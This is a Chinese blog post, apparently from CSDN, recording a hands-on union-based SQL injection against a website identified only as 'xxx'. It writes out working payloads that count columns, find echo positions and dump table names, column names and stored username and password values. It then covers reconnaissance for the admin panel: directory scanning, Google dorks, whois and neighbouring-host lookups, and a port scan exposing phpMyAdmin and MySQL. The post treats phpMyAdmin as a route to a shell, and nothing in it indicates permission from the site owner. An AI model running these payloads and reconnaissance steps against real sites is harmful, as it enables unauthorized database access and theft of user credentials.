记一次union注入

SQL注入

  对比id=1和id=2-1两个页面,页面相同,存在数字型注入。
  对比id=1 order by 7和id=1 order by 6两个页面,6个字段。
  输入单引号,回显为空。(无回显注入?但联合注入成功)
  使用联合注入id=0 union select 1,2,3,4,5,6,发现回显位是1、2、3。(数字型注入不需要使用注释符闭合)

  查表id=0 union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database()
  查字段名id=0 union select group_concat(column_name),user(),version(),4,5,6 from information_schema.columns where table_name=‘contactus’
  查字段值id=0 union select group_concat(username7),group_concat(password7),version(),4,5,6 from dl

参考:
  冰河-《渗透之——SQL注入点检测方法》,
地址https://blog.csdn.net/l1028386804/article/details/84929699



找后台

后台扫描
使用御剑、dirb没扫到后台地址,
google-hacking
site: http://xxx login,没有找到相关页面
site: http://xxx admin,没有找到相关页面

站长工具http://tool.chinaz.com/,利用Whois查询看域名信息
在线网站https://www.webscan.cc/查询旁站和C段

找到IP地址,进行端口扫描,
发现8081端口存在phpMyAdmin服务,3306端口存在Mysql服务。

在这里插入图片描述  Navicat for Mysql过期,需要重新下载。
  对8081进行目录扫描,访问到的都是上图的DBManager,应该是做了访问控制。8081的目录扫描部分结果:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
  据说phpmyadmin的index.php一般是:
在这里插入图片描述

反思

  寻找后台失败:目录扫描。谷歌查找。
  mysql:安装并熟悉Navicat for Mysql管理工具。
  phpmyadmin:不够熟悉,可以作为拿shell的突破点。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值